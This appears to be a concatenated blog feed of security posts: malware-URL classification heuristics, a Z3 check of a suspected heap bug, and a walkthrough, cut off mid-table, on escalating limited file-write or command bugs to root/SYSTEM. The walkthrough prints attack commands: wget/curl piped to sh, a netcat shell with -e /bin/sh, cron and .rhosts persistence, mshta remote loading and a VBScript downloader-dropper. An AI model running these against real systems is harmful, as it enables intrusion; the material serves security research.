<p>Pyew already have one of these heuristic implemented (the obfuscation related one). The other heuristic use is implemented (only for PE files) by the Python library <a href="https://code.google.com/p/pefile/">pefile</a>, by Ero Carrera. There is no magic here: a somewhat “big” binary with very little functions or with code that when analysing produces too many errors and, still, have one, a few or even no detected function at all is considered probably bad. If the application is “packed”, its score is increased by 1. If it’s obfuscated, by 2. However, this heuristic, the one that tries to detect obfuscation (and anti-emulations, etc…), catches like ~50 files per day. Only. Do you want to enhance it to also detect anti-disassembling, for example? Perhaps you get 51 files per day. It can be that my heuristic is bad but I would not recommend spending too much time on it.</p>
<p><strong>ClamAV found malware</strong></p>
<p>As simply as it sounds: ClamAV found malware in the contents of that URL. That’s all, it simply adds 3 points to the total score in case something was found. I use the Python bindings for ClamAV called <a href="https://pypi.python.org/pypi/pyClamd/">pyclamd</a>. I can use one more AV engines/products. Or perhaps a lot of them. Or perhaps another 3rd party “free” service like <a href="https://www.metascan-online.com/">OpSwat Metascan</a> (or <a href="http://www.virustotal.com">VirusTotal</a>, which is better) but… how many URLs are detected this way? A big number of them but not so many. Do you want to add also false positives from more than one AV vendor? I don’t. But this is only my opinion.</p>
<p><strong>Similar malware</strong></p>
<p>This heuristic uses a set of algorithms to cluster unknown malware executables (PE & ELF). It uses Pyew and the algorithms implemented in the Pyew’s tool <a href="https://code.google.com/p/pyew/source/browse/gcluster.py">gcluster</a>. If the file (contents) under analysis is an executable file and via these graph based malware clusterization algorithms it looks too similar (or equal) to a previously known malware I add 3 points to the score of the URL. <SPAM>Similar but more new and advanced algorithms were implemented in the [CAMAL](https://camal.coseinc.com) [clustering](https://camal.coseinc.com/publish/cluster_kryptik_one_not_detected.html) [engine](https://camal.coseinc.com/publish/cluster_infected_goodware.html), a commercial product</SPAM>.</p>
<p>While this heuristic is working, take a look to the percentage of new malware URLs discovered: 3.5% of the total. A lot of work for just the 3.5%. May be it’s a problem of my algorithms, I don’t know. But… I don’t think.</p>
<p><strong>Similar domain</strong></p>
<p>A rather simplistic, even when it seems not, heuristic: if the domain looks too similar to one domain in the first 100.000 records of the Alexa’s Top 1 Million the score is increased by 1. Why? What about a domain named yutuve? What about guugle? Likely being used in a phising campaign or distributing malware.</p>
<p>At first the heuristic used a pure Python implementation of the <a href="https://pypi.python.org/pypi/soundex/1.0">soundex algorithm</a>. After a while I switched to the SOUNDEX function in MySQL. Results of this heuristic: 3.3%. At least it wasn’t that hard to implement…</p>
<p><strong>All the other heuristics</strong></p>
<p>There are other 2 heuristics I implemented, I still use but I do no maintain and I have no interest in maintaining them at all:</p>
<ol>
<li>Suspicious JavaScript. Basically, a pattern matching technique finding for “eval”, “document.write”, “setInterval”, “unescape”, etc… If the patterns are discovered the score is increased by 1. I decided not to loose time adding more “advanced” malicious JavaScript heuristics. The reason? Because it would require a lot of work that must be updated daily. Too much work for a “just for fun” project.</li>
<li>Known bad URL parameter. Pattern matching, again. During some time I had a system to group and extract some of the most common special URL parameter and file names and then use them as another evidence. I do not maintain this list any more for the same reasons as the previous heuristic. If you want to see some examples: the rules “/bot.exe” or “/.*(update|install).*flash.*player.*.exe” were the ones finding more samples.</li>
</ol>
<p><strong>Conclusions and possible future work</strong></p>
<p>Detecting malicious content is not easy and requires a lot of work. Detecting more than 50% of the (dumb) malicious URLs and samples is easy. Detecting something bigger than 70% is a big work. Detecting something similar to 75% requires, in my very subjective opinion, more effort than what you spent for detecting all the previous 70% of samples. If you ever blamed $AV for not detecting this or that relatively new malware sample, please think about all the work that must be done to catch that new family.</p>
<p>As for possible future improvements of Malware Intelligence, if at all, I’m thinking about integrating one more tool of mine: <a href="https://github.com/joxeankoret/multiav">MultiAV</a>. It’s a simple interface to various AV products using the command line scanners to get the detection over a file, directory, etc… Also, I have other heuristics on mind, but no one of them is easy and this is a project that I do during my spare time when I feel like spending some hours on it.</p>
<p>The source code for URLAna, as an independent tool, will be published (once I clean it up and all the code specific to my system is removed) in the next months (when I have time). In any case, with all the details given in this blog post one can implement it (surely better than my prototype-that-grown-a-lot) easily.</p>
<p>I hope you liked this post and that you find it useful. Perhaps it may even help you improving your analysis systems or you can borrow some ideas for another project 😉 Also, if you have any idea to improve that system I would be very happy to read/heard about it 🙂</p>
<p>Cheers!</p>
<p> </p>joxeanTwo years ago I started a project, for fun, to try to catch as much malware and URLs related to malware as possible. I have written about this before. In this post I’ll explain the heuristics I use for trying to classify URLs as malicious with “Malware Intelligence” (the name of the system that generates the daily Malware URLs feed). What a normal user sees in any of the 2 text files offered are simply domains or URLs that I classified as “malicious”. But, how does “Malware Intelligence” classifies them as malicious? What heuristics, techniques, etc… does it use?A vulnerability that was not2014-05-02T08:34:07+02:002014-05-02T08:34:07+02:00http://joxeankoret.com/blog/2014/05/02/a-vulnerability-that-wasnt<p>This is a history of fail. I was analysing a piece of code, in assembly, that I thought would be vulnerable to a zero allocation bug allowing me to overwrite some bytes of heap space (overwriting a structure with many function pointers!). However, after spending like 2 hours analysing statically the “bug”, and documenting it, I finally discovered it wasn’t vulnerable. #Fail.</p>
<!--more-->
<p><strong>The “vulnerable” code</strong></p>
<p>The “vulnerability” I was analysing (that wasn’t a bug finally) was something, stripping non interesting parts, like this one:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">// The not really vulnerable code</span>
<span class="kt">void</span> <span class="nf">foo</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span><span class="p">)(</span><span class="n">x</span> <span class="err">–</span> <span class="mi">69</span><span class="p">)</span> <span class="o">></span> <span class="mh">0x63FFFBB</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">// Can I force here a zero allocation?</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="mi">68</span><span class="p">);</span>
<span class="c1">// Then overwrite heap memory here...</span>
<span class="p">}</span></code></pre></figure>
<p>Taking a brief look: do you think it’s exploitable? Well, at first I thought yes but it isn’t. The 1st check is unsigned and there is no possible number we can craft that subtracting 69 is less or equal to 0x63fffbb and, at the same time, adding to that number 68 would be equal to zero. The best way of probing it: using a SMT solver.</p>
<p><strong>The Z3 SMT Solver</strong></p>
<p>A SMT Solver is a tool to solve <a href="http://en.wikipedia.org/wiki/Satisfiability_Modulo_Theories#SMT_solvers">Satisfiability Modulo Theories</a> problems. The best one I know is <a href="http://z3.codeplex.com/">Z3</a>, which is half open source (the code is open but you cannot use it for commercial purposes). Using a SMT solver like Z3 I would have solved that problem (the probable exploitability of the previous code) in less than 1 minute but I decided it was better to lose 2 hours of my time analysing a non existing bug… In the following lines I will explain how to setup Z3 and use the Python bindings to check if it’s possible to force a zero allocation with this code or not.</p>
<p><strong>Setting up Z3 and the Python bindings</strong></p>
<p>We first need to download the Z3 code:</p>
<pre>git clone https://git01.codeplex.com/z3</pre>
<p>This will download a zip file with all the Z3 code (I don’t know why Microsoft did this..). We need to unpack the downloaded zip file and, after that, execute the following commands (for building it in Linux):</p>
<pre>$ autoconf
$ ./configure
$ make
</pre>
<p>This will make the Z3 binary. Now, we need the Z3 dynamic library as it will be used by the Python bindings. We get it by issuing the following command:</p>
<pre>$ make so</pre>
<p>Now we will have the libz3.so library in the path <strong>$CUR_DIR/bin/external/libz3.so</strong>. We need to put the environment variable LD_LIBRARY_PATH pointing to this directory or just copy the library to /usr/lib or /usr/local/lib. No matter what you do, after this step you will be able to run the Z3 Python bindings. You can try it by running the example named “example.py” provided with the Z3 source code:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">Real</span><span class="p">(</span><span class="s">'x'</span><span class="p">)</span>
<span class="n">y</span> <span class="o">=</span> <span class="n">Real</span><span class="p">(</span><span class="s">'y'</span><span class="p">)</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="n">y</span> <span class="o">></span> <span class="mi">5</span><span class="p">,</span> <span class="n">x</span> <span class="o">></span> <span class="mi">1</span><span class="p">,</span> <span class="n">y</span> <span class="o">></span> <span class="mi">1</span><span class="p">)</span>
<span class="k">print</span> <span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">()</span>
<span class="k">print</span> <span class="n">s</span><span class="p">.</span><span class="n">model</span><span class="p">()</span></code></pre></figure>
<pre>$ python example.py
sat
[y = 2, x = 4]
</pre>
<p><strong>Writing an equation to solve our problem</strong></p>
<p>The provided example for Z3 bindings is just too simple for us. If we try to abstract our problem using only the information given by this example changing from Real to Int it will say that the problem is solvable but we would be wrongly expressing it. A normal “integer” in maths will not be the same like an integer for computers: if we add 1 to 0xFFFFFFFF we will get the number 0x100000000 but, for a computer, it will actually have the value 0x0 (for a 32bit integer). So, instead of using Real or Int, we need to use what is called a “Bit vector”. A bit vector of 32bits is actually what we want. So let’s abstract the predicates of the previous C code and write our first equation with the Z3 bindings for Python:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># Import the Z3 stuff
</span><span class="o">>>></span>
<span class="o">>>></span> <span class="n">x</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s">'x'</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># Create a bit vector of 32bits
</span><span class="o">>>></span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span> <span class="o"><=</span> <span class="mh">0x63fffbb</span><span class="p">,</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="p">)</span> <span class="c1"># Add our equation
</span><span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">()</span> <span class="c1"># And check if it's satisfiable
</span><span class="n">sat</span></code></pre></figure>
<p>So, according to Z3 and the equation we fed to it, it’s solvable! We can get a valid ‘x’ solution for it calling <strong>s.model()</strong>:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">model</span><span class="p">()</span>
<span class="p">[</span><span class="n">x</span> <span class="o">=</span> <span class="mi">4294967228</span><span class="p">]</span>
<span class="o">>>></span> <span class="nb">hex</span><span class="p">(</span><span class="mi">4294967228</span><span class="p">)</span>
<span class="s">'0xffffffbc'</span></code></pre></figure>
<p>OK. According to Z3 the value 0xffffffbc would pass both checks, thus, making a zero allocation. However, the equation we wrote is wrong. Why? Because the following comparison is unsigned and we’re making a signed comparison here:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="n">unsigned</span> <span class="nb">int</span><span class="p">)(</span><span class="n">x</span> <span class="o">-</span> <span class="mi">69</span><span class="p">)</span> <span class="o">></span> <span class="mh">0x63FFFBB</span> <span class="p">)</span></code></pre></figure>
<p>For making an unsigned comparison we need to change the equation to the following one:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULE</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span><span class="p">,</span> <span class="mh">0x63fffbb</span><span class="p">),</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span></code></pre></figure>
<p>The function “ULE” performs an <strong>u</strong>nsigned <strong>l</strong>ess or <strong>e</strong>qual comparison. If we run now our final code:</p>
<figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="o">>>></span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span>
<span class="o">>>></span> <span class="n">x</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s">'x'</span><span class="p">,</span> <span class="mi">32</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">add</span><span class="p">(</span><span class="n">ULE</span><span class="p">(</span><span class="n">x</span><span class="o">-</span><span class="mi">68</span><span class="p">,</span> <span class="mh">0x63fffbb</span><span class="p">),</span> <span class="n">x</span><span class="o">+</span><span class="mi">68</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="o">>>></span> <span class="n">s</span><span class="p">.</span><span class="n">check</span><span class="p">()</span>
<span class="n">unsat</span></code></pre></figure>
<p>We will discover that forcing a zero allocation with the 1st check is *NOT* possible as the comparison is unsigned. It would be possible, though, if the comparison was a signed one.</p>
<p><strong>Conclusion</strong></p>
<p>SMT solvers “may not be” a good solution for whole program analysis, however, it helps a lot vulnerability researchers to determine if a bug candidate is actually a bug or not when performing static analysis. For the next time, instead of losing 1/2 hours trying to guess if it can be possible or not I’ll just check satisfiability with Z3 and I recommend you to do the same: humans are clumsy, machines are better for such tasks.</p>joxeanThis is a history of fail. I was analysing a piece of code, in assembly, that I thought would be vulnerable to a zero allocation bug allowing me to overwrite some bytes of heap space (overwriting a structure with many function pointers!). However, after spending like 2 hours analysing statically the “bug”, and documenting it, I finally discovered it wasn’t vulnerable. #Fail.Owning Unix and Windows systems with a (somewhat) limited vulnerability2013-07-09T07:34:10+02:002013-07-09T07:34:10+02:00http://joxeankoret.com/blog/2013/07/09/owning-unix-and-windows-systems-with-a-somewhat-limited-vulnerability<p>Auditing a product recently I noticed a curious scenario where I control the following:</p>
<ul>
<li><span style="line-height: 13px;">Unix based: The limited vulnerability allows one to create any file as root controlling the contents of that file. I can even overwrite existing files.</span></li>
<li>Windows based: The vulnerability allows one to execute an operating system command but doesn’t allow, for some reason, copying files as the Unix vulnerability allows.</li>
</ul>
<p>In the next paragraphs I will explain how one could exploit such somewhat limited scope vulnerabilities in order to execute remote arbitrary code in the context of the running application (root under Unix and SYSTEM under Windows). In any case, I’ll also explain the opposite case: one can execute an arbitrary operating system command in Unix based systems but can’t create an arbitrary file in the system and one can create an arbitrary file anywhere in the system in Windows operating systems but cannot execute an arbitrary command.</p>
<!--more-->
<p><strong>Unix based systems: one can create a (text) file with controlled contents any where as root</strong></p>
<p>Under a Unix based system, like Linux, it’s trivial to execute arbitrary code when one can create a file as root any where. I’m listing here some of the most trivial examples that comes to mind. The list is not extensive because I think it’s really hard to create a complete list for Unix based systems.</p>
<p><strong>Cron</strong></p>
<p>Create a file in /etc/cron.hourly (or /etc/cron.daily) and wait for, at most, 1 hour. That’s all. One could also, directly, overwrite /etc/crontab (by using a default version for the target operating system, if that information is known). This is the easiest example that comes to mind and the most quick method for executing code as an attacker doesn’t need to wait 1 hour, like with the previous example, because, extracted from the <a href="http://www.manpagez.com/man/8/cron/">cron manpage</a>:</p>
<blockquote>
<p>…cron will then examine the modification time on all crontabs and reload those which have changed. Thus cron need not be restarted whenever a crontab file is modified.</p>
</blockquote>
<p><strong>Rhosts</strong></p>
<p>For some old Unix systems an attacker can create a <strong>.rhosts</strong> file in / or any user’s $HOME directory with the content “+ +”. This command would allow to remotely logging from any host to connect via rlogin to the target machine. It would work, for example, in default installations of AIX (even 6.1).</p>
<p><strong>Default scripts</strong></p>
<p>In all Unix based operating systems there are plenty of shell scripts. As with this “limited” vulnerability it’s possible to create a file anywhere with fully controlled contents and it allows even overwriting existing files, another pretty easy way that comes to mind to take control of an affected machine is to take a default script from the target operating system, modify it and overwrite that file. Examples of such files can be System V init scripts, common cron scripts, specific shell scripts (like /etc/bashrc or /etc/profile), etc… The list of possible target files is really long enough not to continue listing more.</p>
<p><strong>Unix based systems: one can execute an arbitrary operating system command as root</strong></p>
<p><strong>xterm</strong></p>
<p>With an Unix based operating system, if we can execute just one command as root it’s over without the need to do many things. The easiest and most typical command:</p>
<blockquote>
<p>$ xterm –display attackers_machine:0</p>
</blockquote>
<p>…after executing “xhost +” or “xhost ip” in the attackers machine. This will pop-up a xterm (a program quite typically installed in almost all Unix based operating systems) in the attackers machine with root privileges in the target machine. Game over.</p>
<p><strong>wget and curl</strong></p>
<table>
<tbody>
<tr>
<td>Although not always installed in non BSD and Linux operating systems, this is another typical way of exploiting such a vulnerability: we can download a script and execute as much operating system commands as we want. But we many need to execute 2 commands (i.e., it may require 2 shoots) if the vulnerable target applications doesn’t allow to use operators like “</td>
<td>” or “&&” (like in my case). With just one command, supposing we can use some operators one could execute one the following commands:</td>
</tr>
</tbody>
</table>
<blockquote>
<p>$ wget http://url -o something.sh && sh something.sh</p>
</blockquote>
<blockquote>
<table>
<tbody>
<tr>
<td>$ wget http://url -O –</td>
<td>sh -c</td>
</tr>
</tbody>
</table>
</blockquote>
<blockquote>
<p>$ wget http://url_with_an_elf -o elf_file && chmod u+x elf_file && ./elf_file</p>
</blockquote>
<blockquote>
<table>
<tbody>
<tr>
<td>$ curl http://url</td>
<td>sh -c</td>
</tr>
</tbody>
</table>
</blockquote>
<blockquote>
<p>$ wget http://url/netcat -o nc && ./nc -l -p 4444 -e /bin/sh</p>
</blockquote>
<p><strong>Windows based systems: one can execute an arbitrary operating system command as SYSTEM</strong></p>
<p>In Windows we do not (typically) have the utilities curl or wget and there is nothing that mimics such applications, as far as I know. However, there is a tool that can execute remote arbitrary code with some limitations: mshta. This tool called “<a href="http://en.wikipedia.org/wiki/HTML_Application">Microsoft HTML Application Host</a>” is a tool that allows to create HTML+JavaScript/VBScript applications with privileges to execute operating system commands, creating and writing files, etc… It can execute not only local applications but also remote arbitrary applications with such privileges. Extracted from <a href="http://msdn.microsoft.com/en-us/library/ms536496(v=vs.85).aspx">here</a>:</p>
<blockquote>
<p>As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.</p>
<p>In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see <a href="http://msdn.microsoft.com/en-us/library/ms533049(v=vs.85).aspx">command id</a>). And HTAs have read/write access to the files and system registry on the client machine.</p>
<p>The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.</p>
</blockquote>
<p>Just what we want. An example command would look like the following:</p>
<blockquote>
<p>$ mshta http://remote_url/app.hta</p>
</blockquote>
<p>We can, for example, embed a PE (EXE) file in the HTA application with VBScript or JavaScript, decode it, write it to the local system and execute it. We can create such a VBScript file automatically with a tool like <a href="http://www.tarasco.org/security/exe_to_vbs_encoder/">EXETOVBS</a>:</p>
<div style="width: 559px" class="wp-caption aligncenter">
<img alt="EXETOVBS tool" src="http://www.tarasco.org/security/exe_to_vbs_encoder/VBS_Encoder.jpg" width="549" height="485" />
<p class="wp-caption-text">
EXETOVBS
</p>
</div>
<p>One could also use Metasploit as in this <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb">exploit</a>. The only problem I see is that the generated VBScript files will be rather big. Another option: download an EXE file from the HTA application and run it. However, with the ways I know to download files (using the ActiveX object Microsoft.XMLHTTP) we may encounter (at least in Windows 7) the following error: “Safety settings on this computer prohibit accessing a data source in another domain”. Even downloading from the same domain: the HTA application uses the security settings from Internet Explorer to download files, although it doesn’t make any sense to me.</p>
<p>My solution to this problem is the following: Embed another VBS or JS script in the HTA application, decode it, save it as a local file and execute it. As we aren’t running code any more in MSHTA (the application forbidding us to download remote files) but rather in <a href="http://en.wikipedia.org/wiki/Windows_Script_Host">Windows Script Host</a> we can pretty much do anything we want. The following is the final HTA application that drops one VBS script, executes it and, then, that scripts downloads a PE file and runs it (well, not the complete code as I’m stripping the HTML code; just use the onload event of the body element to call this function and you’re done):</p>
<div class="geshi no vb">
<div class="head">
' Payload
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw1">Sub</span> testing<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> fso = <span class="kw1">CreateObject</span><span class="br0">(</span><span class="st0">"Scripting.FileSystemObject"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> MyFile = fso.<span class="me1">CreateTextFile</span><span class="br0">(</span><span class="st0">"script.vbs"</span>, <span class="kw1">True</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"ImageFile = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"binary.exe"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"DestFolder = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"URL = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"http://url/binary.exe"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set xml = CreateObject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"Microsoft.XMLHTTP"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"xml.Open "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"GET"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">", URL, False"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"xml.Send"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"set oStream = createobject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"Adodb.Stream"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adTypeBinary = 1"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adSaveCreateOverWrite = 2"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adSaveCreateNotExist = 1 "</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.type = adTypeBinary"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.open"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.write xml.responseBody"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.savetofile DestFolder & ImageFile, adSaveCreateNotExist"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"' oStream.savetofile DestFolder & ImageFile, adSaveCreateOverWrite"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.close"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"set oStream = nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set xml = Nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Dim objResult"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set objShell = CreateObject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"WScript.Shell"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"objResult = objShell.Run(ImageFile, 1, True)"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set objShell = Nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="kw1">Close</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Dim</span> objResult
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> objShell = <span class="kw1">CreateObject</span><span class="br0">(</span><span class="st0">"WScript.Shell"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
objResult = objShell.<span class="me1">Run</span><span class="br0">(</span><span class="st0">"script.vbs"</span>, <span class="nu0">1</span>, <span class="kw1">True</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
Window.<span class="kw1">Close</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">End</span> <span class="kw1">sub</span>
</div>
</li>
</ol>
</div>
<p><strong>Windows based systems: one can create an arbitrary (text) file with controlled contents any where as system</strong></p>
<p>This is probably the most complex scenario. In Windows there is no crontab neither a directory like /etc/cron.hourly or daily. But there are other approaches we can take in order to own such operating system.</p>
<p><strong>Startup folders</strong></p>
<p>If we can create a file in a user’s startup folder, this file/script will be executed as soon as the user logins. In Windows 7 one could create a file in the directory:</p>
<p>C:\Users\%username%\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\Startup</p>
<p>…if we target a specific user, or in the following directory to affect all users in the system:</p>
<p>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup</p>
<p>We can use the previous VBS script to download an arbitrary EXE file to the target machine and execute it. However, there is one problem: what if no user logins in days? We need to find other ways…</p>
<p><strong>MOF files</strong></p>
<p>I’ll not extend on this topic too much as it’s very well explained <a href="http://poppopret.blogspot.fr/2011/09/playing-with-mof-files-on-windows-for.html">here</a>, I’ll only explain the basics. In a nutshell, a file with the extension .MOF created in the directory <strong>%SystemRoot%\System32\wbem\mof\ </strong>is automatically compiled and registered in the WMI repository in Windows operating systems <= Vista. A MOF file is a handler of system events that can execute arbitrary code (i.e., VBScript). If we create a .MOF file for handling any event executing the previous .VBS script we will, almost instantly, execute that code.</p>
<p>However, as pointed by Joshua Drake, MOF files are not “automagically” compiled in Vista+. Probably, but I didn’t test it, if uploading binary files is allowed, one could upload an already compiled MOF file. But, I repeat, this is a theoretical probable attack as I have not tested it myself. But, anyway, we have more options to select from (UPDATE: Joshua Drake says it’s possible).</p>
<p><strong>Task Scheduler</strong></p>
<p>This service is the typical Unix cron of Windows. But it isn’t as easy as with /etc/cron.hourly or /etc/cron.daily: placing a file in the corresponding directory doesn’t make it to automatically be executed as this task must be registered in the registry. But what about overwriting files of commonly (default) installed tasks? From the following <a href="http://support.microsoft.com/kb/939039">list</a> there are various that looks very interesting:</p>
<table id="MT3" cellspacing="0">
<tr>
<td>
GatherWirelessInfo
</td>
<td>
Wireless
</td>
<td>
